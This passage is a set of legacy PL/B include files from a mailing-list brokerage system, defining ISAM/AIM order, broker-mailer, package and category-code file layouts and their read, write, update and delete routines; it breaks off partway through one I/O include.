. REC LENGTH: 262 FIXED
. INDEX KEY : (1) 7-12 (LR#)
.AIMDEX KEYS: (1) 3-6 (MAILER#)
. (2) 16-21 (LIST#)
. (3) 26-32 (PO#)
. (4) 269-272(broker#)
..............................................................................
.
. ENTRY POINT : NORDKEY
. REQUIRED : 'NORDPATH', 'NORDFLD', or 'nordfld4
. RETURNED : ORDER RENORD
. DESCRIPTION : EXACT ISAM KEY READ
.
.NORDKEY COMPARE NORDPATH TO NORDFLAG
. Exact ISAM key read.  NORDPATH selects the branch: 1 = keyed read of
. NORDFILE for key NORDFLD into ORDVARS (file is opened on first use
. and the read runs under a FILEPI lock); 2 = invalid -> NORDERR.
. The third (NORDFLE3) path is retired - its code is commented out.
NORDKEY  branch nordpath to nord1a,norderr
.NORDKEY branch nordpath to nord1a,norderr,nord1c
nord1a   compare nordpath to nordflag
         GOTO NORD1b IF EQUAL
         CALL NORDOPEN
NORD1B   FILEPI 1;NORDFILE
         READ NORDFILE,NORDFLD;ORDVARS
.
         RETURN
.
.nord1c  branch nordflg3 to nord1d
.        CALL NORDOPN3
NORD1d
.        FILEPI 1;NORDFLE3
.        READ NORDFLE3,NORDFLD4;ORDVARS
.
         RETURN
..............................................................................
.
. ENTRY POINT : NORDTST
. REQUIRED : NORDFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
.NORDTST COMPARE NORDPATH TO NORDFLAG
. Key test read: checks whether a record exists for the given key
. without keeping the record (contents land in scratch STR1).
. NORDPATH 1 = primary ISAM key NORDFLD; 2 = invalid -> NORDERR;
. 3 = AIM read on NORDFLE2 with keys NORDFLD1-NORDFLD4.
NORDTST  branch nordpath to nord2a,norderr,nord2c
nord2a   COMPARE NORDPATH TO NORDFLAG
         GOTO NORD2b IF EQUAL
         CALL NORDOPEN
NORD2b   FILEPI 1;NORDFILE
         READ NORDFILE,NORDFLD;STR1
         RETURN
.
. The NORDFLE3 variant below is retired; path 3 now goes to the AIM
. file via nord2c/NORD2d.
.nord2c branch NORDFLG3 to nord2d
. CALL NORDOPN3
.NORD2d FILEPI 1;NORDFLE3
. READ NORDFLE3,NORDFLD4;;
. RETURN
.nord2e BRANCH NORDFLG2 TO NORD2f
nord2c   BRANCH NORDFLG2 TO NORD2d
         CALL NORDOPN2
.NORD2f FILEPI 1;NORDFLE2
NORD2d   FILEPI 1;NORDFLE2
         READ NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;str1
         RETURN
..............................................................................
.
. ENTRY POINT : NORDKS
. REQUIRED : 'NORDPATH'
. RETURNED : ORDER RENORD
. DESCRIPTION : KEY SEQUENTIAL ORDER FILE READ
.
. Key-sequential read: next record in key order following the most
. recent keyed read (path 1 only; the NORDFLE3 variant is retired).
nordks
.NORDKS COMPARE NORDPATH TO NORDFLAG
.NORDKS branch nordpath to nord3a,norderr,nord3c
nord3a   COMPARE NORDPATH TO NORDFLAG
         GOTO NORD3b IF EQUAL
         CALL NORDOPEN
NORD3b   FILEPI 1;NORDFILE
         READKS NORDFILE;ORDVARS
.
         RETURN
.
.nord3c branch NORDFLG3 to nord3d
. CALL NORDOPN3
.NORD3d FILEPI 1;NORDFLE3
. READKS NORDFLE3;ORDVARS
.
. RETURN
..............................................................................
.
. ENTRY POINT : NORDSEQ
. REQUIRED :
. RETURNED : ORDER RENORD
. DESCRIPTION : SEQUENTIAL ORDER FILE READ
.
. Physical-sequential read of the next record into ORDVARS.
NORDSEQ  BRANCH NORDFLAG TO NORD4
         CALL NORDOPEN
NORD4    FILEPI 1;NORDFILE
         READ NORDFILE,SEQ;ORDVARS
         RETURN
..............................................................................
.
. ENTRY POINT : NORDWRT
. REQUIRED : 'NORDFLD', 'NORDPATH=1'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT., ISI 2/3 INSERTS.
.
. NORDWRT: write a new order record.  Forces NORDPATH to 1 (primary
. ISAM), writes ORDVARS under key NORDFLD, then inserts the AIM index
. entry via NORDWRT2.  The NORDFLE3 insert (NORDWRT3) is retired.
NORDWRT  MOVE C1 TO NORDPATH
NORDWRT1 COMPARE NORDPATH TO NORDFLAG
         GOTO NORD5 IF EQUAL
         CALL NORDOPEN
NORD5    FILEPI 1;NORDFILE
         WRITE NORDFILE,NORDFLD;ORDVARS
.
         CALL NORDWRT2
.        CALL NORDWRT3
         RETURN
.
. NORDWRT2: add the just-written record to the AIM (aimdex) file.
NORDWRT2 BRANCH NORDFLG2 TO NORD5B
         CALL NORDOPN2
NORD5B   FILEPI 1;NORDFLE2
         INSERT NORDFLE2
         RETURN
.
.NORDWRT3 BRANCH NORDFLG3 TO NORD5C
. CALL NORDOPN3
NORD5c
. FILEPI 1;NORDFLE3
. INSERT NORDFLE3,NORDFLD4
         RETURN
.
..............................................................................
.
. ENTRY POINT : NORDUPD
. REQUIRED : A PREVIOUS KEY READ, 'NORDPATH'
. RETURNED :
. DESCRIPTION : KEY UPDATE ORDER FILE
.
. NORDUPD: rewrite the record obtained by the immediately preceding
. keyed read (record position is held by the file channel).
NORDUPD  COMPARE NORDPATH TO NORDFLAG
         GOTO NORD6 IF EQUAL
         CALL NORDOPEN
NORD6    FILEPI 1;NORDFILE
         UPDATE NORDFILE;ORDVARS
         RETURN
..............................................................................
.
. ENTRY POINT : NORDDEL
. REQUIRED : 'NORDPATH', 'NORDFLD'
. RETURNED :
. DESCRIPTION : PATH=1 DELETES TXT & ALL KEYS. PATH=2/3/4 DELETES KEY ONLY.
.
. NORDDEL1 re-reads the record via NORDKEY first and returns if the
. key is missing (OVER); OLRN is restored into NORDFLD before delete.
NORDDEL  BRANCH NORDPATH TO NORDDEL1,NORDDEL2
.
NORDDEL1 COMPARE NORDPATH TO NORDFLAG
         GOTO NORD7 IF EQUAL
         CALL NORDOPEN
NORD7    CALL NORDKEY
         RETURN IF OVER
         MOVE OLRN TO NORDFLD
         FILEPI 1;NORDFILE
         DELETE NORDFILE,NORDFLD
         RETURN
.
. NORDDEL2: remove the current record's AIM index entry only.
NORDDEL2 BRANCH NORDFLG2 TO NORD7B
         CALL NORDOPN2
NORD7B   FILEPI 1;NORDFLE2
         DELETE NORDFLE2
         RETURN
.
..............................................................................
.
. ENTRY POINT : NORDKP
. REQUIRED : 'NORDPATH'
. RETURNED : ORDER RENORD
. DESCRIPTION : KEY SEQUENTIAL ORDER FILE READ
.
. NORDKP: key-prior read - previous record in key order (path 1).
NORDKP   COMPARE NORDPATH TO NORDFLAG
         GOTO NORD8 IF EQUAL
         CALL NORDOPEN
NORD8    FILEPI 1;NORDFILE
         READKP NORDFILE;ORDVARS
.
         RETURN
..............................................................................
.
. ENTRY POINT : NORDAIM
. REQUIRED : NORDFLD1,NORDFLD2,NORDFLD3,nordfld4
. RETURNED : ORDER RECORD
. DESCRIPTION : AIM ORDER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORDAIM  BRANCH NORDFLG2 TO NORD9
. GOTO NORD9 IF EQUAL
         CALL NORDOPN2
NORD9    FILEPI 1;NORDFLE2
         READ NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;ORDVARS
         RETURN
..............................................................................
..............................................................................
.
. ENTRY POINT : NORDAIMt
. REQUIRED : NORDFLD1,NORDFLD2,NORDFLD3,nordfld4
. RETURNED : OVER/OR NOT
. DESCRIPTION : AIM ORDER FILE TEST READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Same as NORDAIM but discards the record (';;' - existence test).
NORDAIMT BRANCH NORDFLG2 TO NORD12
. GOTO NORD9 IF EQUAL
         CALL NORDOPN2
NORD12   FILEPI 1;NORDFLE2
         READ NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;;
         RETURN
..............................................................................
.
. ENTRY POINT : NORDKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : ORDER RECORD
. DESCRIPTION  : AIM KEY GENERIC ORDER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. NORDKG: AIM key-generic read - next record matching the current AIM
. selection.  NOTE(review): the SCAN "F *" / display of OLRN below
. looks like leftover debug output - confirm before removing.
NORDKG   BRANCH NORDFLG2 TO NORD10
         CALL NORDOPN2
NORD10   FILEPI 1;NORDFLE2
         READKG NORDFLE2;ORDVARS
         SCAN "F *" IN ERROR
         if equal
         display *p1:20,olrn,*w2
         endif
         RETURN
..............................................................................
.
IFZ PC
. ENTRY POINT : NORDKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : ORDER RECORD
. DESCRIPTION : Aim KEY GENERIC PRIOR ORDER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. Compiled only under the PC conditional (IFZ PC ... XIF).
NORDKGP  BRANCH NORDFLG2 TO NORD11
         CALL NORDOPN2
NORD11   FILEPI 1;NORDFLE2
         READKGP NORDFLE2;ORDVARS
         RETURN
XIF
..............................................................................
.
. ENTRY POINT : NORDlast
. REQUIRED : NORDFLD1,NORDFLD2,NORDFLD3,nordfld4
. RETURNED : ORDER RECORD
. DESCRIPTION : AIM ORDER FILE READ last matching record
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NORDlast BRANCH NORDFLG2 TO NORD13
. GOTO NORD13 IF EQUAL
         CALL NORDOPN2
NORD13   FILEPI 1;NORDFLE2
         READLast NORDFLE2,NORDFLD1,NORDFLD2,NORDFLD3,NORDFLD4;ORDVARS
         RETURN
..............................................................................
...............................................................................
.
. ENTRY POINT : NORDOPEN
. REQUIRED : 'NORDPATH'
. RETURNED     : 'NORDFLAG' SET TO THE PATH NUMBER: 'NORDPATH', IF OPENED.
. DESCRIPTION : OPEN NIN ORDER FILE, DEPENDENT ON PATH NUMBER.
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. NORDOPEN: open the order file selected by NORDPATH (name picked from
. NORDNME1/NORDNME2/NORDNME3) and record the path in NORDFLAG.  On an
. I/O trap the name is handed to FILEGONE, which reports and aborts.
NORDOPEN LOAD NORDNAME USING NORDPATH FROM NORDNME1,NORDNME2,NORDNME3
         TRAP NORDGONE IF IO
         OPEN NORDFILE,NORDNAME
         TRAPCLR IO
         MOVE NORDPATH TO NORDFLAG
         RETURN
NORDGONE MOVE NORDNAME TO FILENAME
         CALL FILEGONE
.
...............................................................................
.
. ENTRY POINT : NORDOPN2
. REQUIRED :
. RETURNED : 'NORDFLG2' SET TO '1', IF OPENED.
. DESCRIPTION : OPEN NIN ORDER FILE, AIMDEXED
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NORDOPN2 TRAP NORDGNE2 IF IO
         OPEN NORDFLE2,NORDNME2
         TRAPCLR IO
         MOVE C1 TO NORDFLG2
         RETURN
NORDGNE2 MOVE NORDNME2 TO FILENAME
         CALL FILEGONE
.
         TRAPCLR IO
         RETURN
...............................................................................
.
. ENTRY POINT : NORDOPN3
. REQUIRED :
. RETURNED : 'NORDFLG3' SET TO '1', IF OPENED.
. DESCRIPTION : OPEN NIN ORDER FILE,
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. NORDOPN3 is deliberately disabled: it jumps straight to the
. file-gone handler (the NORDFLE3 file has been retired).
NORDOPN3
         goto nordgne3
         TRAP NORDGNE3 IF IO
. OPEN NORDFLE3,NORDNME3
         TRAPCLR IO
. MOVE C1 TO NORDFLG3
         RETURN
NORDGNE3 MOVE NORDNME3 TO FILENAME
         CALL FILEGONE
.
         TRAPCLR IO
         RETURN
. norderr: reached on an invalid NORDPATH value; reports and aborts.
norderr  move "invalid path" to filename
         call filegone
         trapclr io
         return
..............................................................................
<file_sep>/include/NXRF1DD.INC
******************************************************************************
*VARIABLE INCLUSION FOR DIAL IN BROKER/MAILER REF FILE.
******************************************************************************
* REVISION:
* 16JUN98 DLH ADDED ID CODE FOR GREATER SECURITY ON BBS.
*
* FILE: brk_MLR
* RECORD SIZE:
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 ID & BROKER NUMBER 1-7
* KEY: 2 MAILER NUMBER 8-13 -
******************************************************************************
. Patch 1.1 ASH 15MAR2005 Mailer/Broker field conversion
. Note that this file is no longer used. Conversion is merely for protocol
.
.START PATCH 1.1 REPLACED LOGIC
.NXRF1FLE IFILE KEYLEN=8
..
.NXRF1FLG FORM 1
.NXRF1PTH FORM 1
.NXRF1NME DIM 8
.NXRF1NAM INIT "BRK_MLR "
..
.NXRF1FLD DIM 9
..
.NXRF1ID DIM 1 1-1 id B=BRK.CONSULT M=MAILER
.NXRF1BRK DIM 4 2-5 BROKER/CONSULTANT OR MAILER
.NXRF1MLR DIM 4 6-9 MAILER NUMBER
.NXRF1DTE DIM 8 11-17 DATE ADDED
.NXRF1USR DIM 10 21-30 WHOM
................................
NXRF1FLE IFILE KEYLEN=12
.
NXRF1FLG FORM 1
NXRF1PTH FORM 1
NXRF1NME DIM 8
NXRF1NAM INIT "BRK_MLR|NINS1:502"
.
NXRF1FLD DIM 13
.
NXRF1ID DIM 1 1-1 id B=BRK.CONSULT M=MAILER
NXRF1BRK DIM 6 2-7 BROKER/CONSULTANT OR MAILER
NXRF1MLR DIM 6 8-13 MAILER NUMBER
NXRF1DTE DIM 8 14-21 DATE ADDED
NXRF1USR DIM 10 22-31 WHOM
.END PATCH 1.1 REPLACED LOGIC
..............................................................................
<file_sep>/include/nmlrxydd.inc
..............................................................................
.
. NMLRXYDD INCLUSION
. NIN MAILER TO MAILER FILE DEFINITION
.
. FILE NAME : NINMLRXY
. REC LENGTH: 1068 FIXED
. INDEX KEY : (1) 1-12 (MAILER1/MAILER2)
.AIMDEX KEYS: (1) 1-12 (MAILER1/MAILER2)
.
..............................................................................
NMLRXYFLIST FILELIST
nmlrxyfile ifile keylen=12,FIXED=1068,Name="NINMLRXY.ISI"
nmlrxyfle2 Afile FIXED=1068,Name="NINmlrxy.AAM"
FILELISTEND
.
nmlrxyname init "NINMLRXY"
NMLRXYFLD DIM 12 .MAILER NUMBER 1 + MAILER NUMBER 2
NMLRXYFLD1 DIM 15 .MAILER NUMBER AIMKEY
NMLRXYFLAG FORM 1
NMLRXYLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=No locks
.
NMLRXYVARS LIST
NMLRXYMLR1 DIM 6 1-6 MAILER1 NUMBER
NMLRXYMLR2 DIM 6 7-12 MAILER2 NUMBER
NMLRXYNOTE DIM 750 13-762 NOTES
NMLRXYNOTE2 DIM 250 763-1012 NOTES
NMLRXYDATE DIM 8 1013-1020 RECORD DATE
NMLRXYUDATE DIM 8 1021-1028 UPDATE DATE
NMLRXYINITS DIM 10 1029-1038 PERSON WHO LAST MODIFIED
NMLRXYFILL DIM 30 1039-1068 FILLER
LISTEND
<file_sep>/include/DTPDD.inc
;.............................................................
. Patch 1.1 ASH 12/29/2004 - Mailer/Broker Conversion
.
.DTPFile Ifile Key=8,fixed=40
.DTPFlag Form 1
.DTPName Init "DaysToPay"
.;Workvars
.DTPFld Dim 8
.;
.DTPbroker Dim 4 1-4
.DTPMailer Dim 4 5-8
.DTP3yrcount form 5 9-13
.DTP3yrDays Form 9 14-22
.DTP1yrcount form 5 23-27
.DTP1yrDays Form 9 28-36
.DTPFill Dim 4 37-40
..............................................................
DTPFile Ifile Key=12,fixed=44
DTPFlag Form 1
DTPName Init "DaysToPay|NINS1:502 "
.;Workvars
DTPFld Dim 12
.;
DTPbroker Dim 6 1-6
DTPMailer Dim 6 7-12
DTP3yrcount form 5 13-17
DTP3yrDays Form 9 18-26
DTP1yrcount form 5 27-31
DTP1yrDays Form 9 32-40
DTPFill Dim 4 41-44
.;.............................................................
<file_sep>/include/npkgio2.inc
..............................................................................
.
. NPKGIO2 INCLUSION
. NIN PACKAGE 'Get Next Record' FILE IO ROUTINES
.
. FILE NAME : PKGNXT.DAT
.
. REC LENGTH: 25 FIXED
. INDEX KEY : 001-004 Mailer
.
.
..............................................................................
.NPKGNXTKEY - Isam key read
.
. ENTRY POINT : NPKGNXTKEY
. REQUIRED : 'NPKGNXTFLD'
. RETURNED : PACKAGE GET NEXT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPKGNXTKEY
. Exact ISAM key read: fetch the record for key NPKGNXTFLD (mailer
. number) into NPKGNXTVARS.  Opens the file on first use; I/O errors
. trap to IOMssg with the Error flag set - caller tests flags.
         BRANCH NPKGNXTFLAG TO NPKGNXT1
         CALL NPKGNXTOPEN
NPKGNXT1
         trap IOMssg giving Error if IO
         FILEPI 1;NPKGNXTFILE
         READ NPKGNXTFILE,NPKGNXTFLD;NPKGNXTVARS
         trapclr IO
         RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTTST
. REQUIRED : 'NPKGNXTFLD'
. RETURNED :
. DESCRIPTION : TEST KEY
.
. Existence test only: record contents are discarded (';;').
NPKGNXTTST
         BRANCH NPKGNXTFLAG TO NPKGNXT2
         CALL NPKGNXTOPEN
NPKGNXT2
         trap IOMssg giving Error if IO
         FILEPI 1;NPKGNXTFILE
         READ NPKGNXTFILE,NPKGNXTFLD;;
         trapclr IO
         RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTSEQ
. REQUIRED :
. RETURNED : PACKAGE GET NEXT RECORD
. DESCRIPTION : SEQUENTIAL PACKAGE GET NEXT FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPKGNXTSEQ
. Physical-sequential read of the next record into NPKGNXTVARS.
. NOTE(review): the FILEPI lock is taken on NPKGNXTFILE but the read
. is against NPKGNXTFLE2 (the second channel NPKGNXTOPEN opens on the
. same file) - confirm this is intentional before changing either.
         BRANCH NPKGNXTFLAG TO NPKGNXT4
         CALL NPKGNXTOPEN
NPKGNXT4
         trap IOMssg giving Error if IO
         FILEPI 1;NPKGNXTFILE
         READ NPKGNXTFLE2,SEQ;NPKGNXTVARS
         trapclr IO
         RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NPKGNXTWRT
. Insert a new 'get next record' entry from NPKGNXTVARS.
. FIX: "BRANCH NPKGNXTFLAG OF NPKGNXT5" corrected to "... TO ..." -
. every other BRANCH in this include (and the whole file) uses TO;
. OF was a typo that the compiler would reject or misparse.
         BRANCH NPKGNXTFLAG TO NPKGNXT5
         CALL NPKGNXTOPEN
NPKGNXT5
         trap IOMssg giving Error if IO
         FILEPI 1;NPKGNXTFILE
         WRITE NPKGNXTFILE;NPKGNXTVARS
         trapclr IO
         RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE PACKAGE FILE
.
NPKGNXTUPD
. Rewrite the record obtained by the immediately preceding keyed read.
         BRANCH NPKGNXTFLAG TO NPKGNXT6
         CALL NPKGNXTOPEN
NPKGNXT6
         trap IOMssg giving Error if IO
         FILEPI 1;NPKGNXTFILE
         UPDATE NPKGNXTFILE;NPKGNXTVARS
         trapclr IO
         RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTDEL
. REQUIRED : VALID FILE READ
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NPKGNXTDEL
         BRANCH NPKGNXTFLAG TO NPKGNXT7
         CALL NPKGNXTOPEN
NPKGNXT7
         trap IOMssg giving Error if IO
         FILEPI 1;NPKGNXTFILE
         DELETE NPKGNXTFILE
         trapclr IO
         RETURN
..............................................................................
.
. ENTRY POINT : NPKGNXTOPEN
. REQUIRED : 'NPKGNXTFLAG'
. RETURNED : 'NPKGNXTFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN PACKAGE 'GET NEXT RECORD' FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. Opens two channels on the same file: NPKGNXTFILE (keyed access) and
. NPKGNXTFLE2 (sequential access).  NPKGNXTLOCK selects the mode:
. first branch target = default open, second = LOCKMANUAL,SINGLE on
. the keyed channel.
NPKGNXTOPEN
         TRAP NPKGNXTGONE giving Error IF IO
         BRANCH NPKGNXTLOCK TO NPKGNXTOPNL,NPKGNXTOPNR
NPKGNXTOPNL
         OPEN NPKGNXTFILE,NPKGNXTNAME
         OPEN NPKGNXTFLE2,NPKGNXTNAME
         TRAPCLR IO
         MOVE C1 TO NPKGNXTFLAG
         RETURN
NPKGNXTOPNR
         OPEN NPKGNXTFILE,NPKGNXTNAME,LOCKMANUAL,SINGLE
         OPEN NPKGNXTFLE2,NPKGNXTNAME
         TRAPCLR IO
         MOVE C1 TO NPKGNXTFLAG
         RETURN
.
NPKGNXTGONE
         MOVE NPKGNXTNAME TO FILENAME
         CALL FILEGONE
..............................................................................
.END OF INCLUDE
<file_sep>/include/NSPEDD.INC
...............................................................................
.
. NSPEDD INCLUSION
. NIN ORDER 00/99/98 FILE DEFINITION
.
. FILE NAME : NINSPEC
. REC LENGTH: 758 used to be 288 COMP
. INDEX KEY : 1-6
.PATCH #1.2 - DMB 18JUN05 Changed IP Address of File Manager
. Last update add nspelock DLH 10Jun98
.PATCH #1.1 - ASH 04May99 - File conversion/increase
..............................................................................
.
NSPEFILE IFILE KEYLEN=6,VAR=758,COMP,NODUPLICATES
.NSPENAME INIT "NINSPEC "
.>Patch 1.2 Begin
.NSPENAME INIT "NINSPEC.ISI|20.20.30.103:502"
NSPENAME INIT "NINSPEC.ISI|NINS1:502"
.>Patch 1.2 End
NSPEFLD DIM 6
NSPEFLAG FORM 1
nspelock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NSPEVARS list
NSPELR dim 6 1-6 LR NUMBER
DESC001 DIM 78 7-84 NON-MODIFIABLE XSTAT
DESC002 DIM 674 85-758 MODIFIABLE INSTRUCTIONS
listend
.
.desc002 gets parsed into 14 55 byte lines ???
<file_sep>/DEVELOP/ListMarketsProject/NCATCODEDD.INC
* NCATCODEDD.INC
* ************************************************************************************************
**
* NAMES IN THE NEWS MASTER CATEGORY CODES REFERENCE FILE
* ************************************************************************************************
**
.
. FILE: NINCODEDD.INC
. LENGTH: 14
. TYPE: ISAM/AAM
. KEY: 1-6 NCATCODENUM (LIST NUM)
. XXX
. XXX
. AAMKEY: XXXXXX
...................................................................................................
..
NCATCODENAME INIT "NINCODE"
NCATCODELIST FILELIST
NCATCODEFILE IFILE KEYLEN=6,FIXED=14,Name="NINCODE.isi"
NCATCODEFLE2 AFILE FIXED=14,Name="NINCODE.aam"
FILELISTEND
NCATCODEFLAG FORM 1
NCATCODEFLD DIM 6 // HOLD LIST NUM
NCATCODEFLD1 DIM 4 // 3 PLUS 1 FOR AAM READ
.
NCATCODEVARS LIST
NCATCODENUM DIM 6 1-6 LIST NUMBER
NCATCODETYPE DIM 1 7-7 LIST TYPE
.1 "B" Byrs/Subs
.2 "D" Dnrs/Mbrs
.3 "C" Compiled
NCATCODEMARKET DIM 27 8-34 BROAD MARKET
NCATCODESUBMARK DIM 43 35-77 SUB-MARKET
NCATCODEENV DIM 33 78-110 ENVIRONMENTAL
NCATCODEPOLIT DIM 33 111-143 POLITICAL
NCATCODEHEALTH DIM 29 144-172 HEALTH/CHARIT
NCATCODEPROG DIM 33 173-205 PROGRESSIVE
NCATCODEFOCUS DIM 1 206-206 LIST FOCUS
.1 "C" Christian
.2 "V" Veterans
.3 "P" Pets
.4 "W" Women
.5 "K" Children
.6 "S" Seniors
.7 "G" Gay/Lesbian
.8 "J" Jewish
NCATCODEFILL DIM 44 207-250
LISTEND
<file_sep>/include/MEDIAOLD.INC
. .............................................................................
. MEDIA TABLE.
. ............
.
MEDIA DIM 28
.
MED0 INIT "MAG TAPE 9T 1600 OR 6250 BPI"
MED1 INIT "DISKETTE "
MED2 INIT "4-ACROSS CHESHIRE"
MED3 INIT "PRESS.SENS.LABELS"
MED4 INIT "IBM 3480 TAPE CARTRIDGE"
MED5 INIT "1-UP CHESHIRE"
MED6 INIT "PACKAGE INSERTS"
MED7 INIT "MAG TAPE 9T 1600 BPI"
MED8 INIT "MAG TAPE 9T 800 OR 1600 BPI"
MED9 INIT "MATCH-COL TP"
MED10 INIT "MAGTAPE 9T 1600/6250 $15FLT"
MED11 INIT "MAGTAPE 9T 1600/6250 $20FLT"
MED12 INIT "MAGTAPE 9T 1600/6250 $25FLT"
MED13 INIT "MAGTAPE 9T 1600/6250 $30FLT"
MED14 INIT "MAGTAPE 9T 1600 $15FLT"
MED15 INIT "MAGTAPE 9T 1600 $20FLT"
MED16 INIT "MAGTAPE 9T 1600 $25FLT"
MED17 INIT "MAGTAPE 9T 1600 $30FLT"
MED18 INIT "PRESS.SENS.LABELS @ $7/M"
MED19 INIT "MAG TAPE SEE SPECIAL INST"
MED20 INIT " "
.MED20 INIT "really used by dummy orders"
MED21 INIT "PRESS.SENS.LABELS @ $10/M"
MED22 INIT " "
MED23 INIT " "
MED24 INIT " "
MED25 INIT " "
<file_sep>/include/COMMONNY.INC
..............................................................................
.
. COMMON
.
. COMMON UDA VARIABLES
.
$ERROR DIM *12 DATASHARE ERROR MESSAGE
$PORTN DIM *2 SOFT PORT NUMBER
$TODAY DIM *8 DATE IN mm/dd/yy FORMAT
$JULIAN FORM *5 TODAY IN yyjjj FORMAT
.
$USER DIM *10 USER ID
$USERNME DIM *10 USER NAME (FIRST INIT, LAST)
$PRIO FORM *3 OVERALL PRIORITY LEVEL
$LEVELS DIM *36 SECURITY LEVELS
$COMM DIM *1 COMMUNICATION ALLOWED
.
$COMPANY FORM *1 COMPANY CODE (1-NIN,2-CMP,3-DECK,4-DATA)
$COMPNME DIM *24 COMPANY NAME TEXT
$MULTCOS FORM *1 MULTIPLE COMPANIES ALLOWED
$CURSYS FORM *1 CURRENT SYSTEM
$CURLEVL FORM *1 CURRENT LEVEL WITHIN SYSTEM
$MULTSYS FORM *1 MULTIPLE SYSTEMS ALLOWED
$PROGRAM DIM *8 LAST PROGRAM NAME
$FUNC FORM *1
$COMMENT DIM *20
.
..............................................................................
<file_sep>/include/M2NLoIO.inc
..............................................................................
.******************************************************
.* M2N List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* M2N DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam fixed
...................
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing M2N, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : M2NLoKEY
. REQUIRED : 'M2NLoFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. M2NLoKEY: exact ISAM key read.  M2NLoPath selects the channel:
. 1 = M2NLoFile keyed by M2NLoFld, 2 = M2NLoFile2 keyed by M2NLoFld2;
. either path opens the file list on first use.
. NOTE(review): "Branch M2NLoPath,label,label" omits the TO keyword
. used by every other include in this file - confirm this comma form
. is accepted by the compiler before touching it.
M2NLoKEY Branch M2NLoPath,M2NLo1a,M2NLo1c
M2NLo1a  BRANCH M2NLoFlag TO M2NLo1B
         CALL M2NLoOpen
M2NLo1B  FILEPI 1;M2NLoFile
         READ M2NLoFile,M2NLoFld;M2NLoVars
         RETURN
M2NLo1C  BRANCH M2NLoFlag TO M2NLo1D
         CALL M2NLoOpen
M2NLo1D  FILEPI 1;M2NLoFile2
         READ M2NLoFile2,M2NLoFld2;M2NLoVars
         RETURN
..............................................................................
.
. ENTRY POINT : M2NLoTST
. REQUIRED : M2NLoFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
M2NLoTST Branch M2NLoPath,M2NLo2a,M2NLo2C
M2NLo2a BRANCH M2NLoFlag TO M2NLo2B
CALL M2NLoOpen
M2NLo2B FILEPI 1;M2NLoFile
READ M2NLoFile,M2NLoFld;STR1
RETURN
M2NLo2c BRANCH M2NLoFlag TO M2NLo2D
CALL M2NLoOpen
M2NLo2d FILEPI 1;M2NLoFile2
READ M2NLoFile2,M2NLoFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoKS
. REQUIRED :
. RETURNED : M2NLo Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
M2NLoKS Branch M2NLoPath,M2NLo3a,M2NLo3C
M2NLo3A BRANCH M2NLoFlag TO M2NLo3B
CALL M2NLoOpen
M2NLo3B FILEPI 1;M2NLoFile
READKS M2NLoFile;M2NLoVars
RETURN
M2NLo3C BRANCH M2NLoFlag TO M2NLo3D
CALL M2NLoOpen
M2NLo3D FILEPI 1;M2NLoFile2
READKS M2NLoFile2;M2NLoVars
RETURN
..............................................................................
. ENTRY POINT : M2NLoSEQ
. REQUIRED :
. RETURNED : M2NLo Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
M2NLoSEQ BRANCH M2NLoFlag TO M2NLo4
CALL M2NLoOpen
M2NLo4 FILEPI 1;M2NLoFile
READ M2NLoFile,SEQ;M2NLoVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoWRT
. REQUIRED : 'M2NLoFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
M2NLoWRT BRANCH M2NLoFlag TO M2NLo5
CALL M2NLoOpen
M2NLo5 FILEPI 1;M2NLoFlist
WRITE M2NLoFlist;M2NLoVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NLoUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
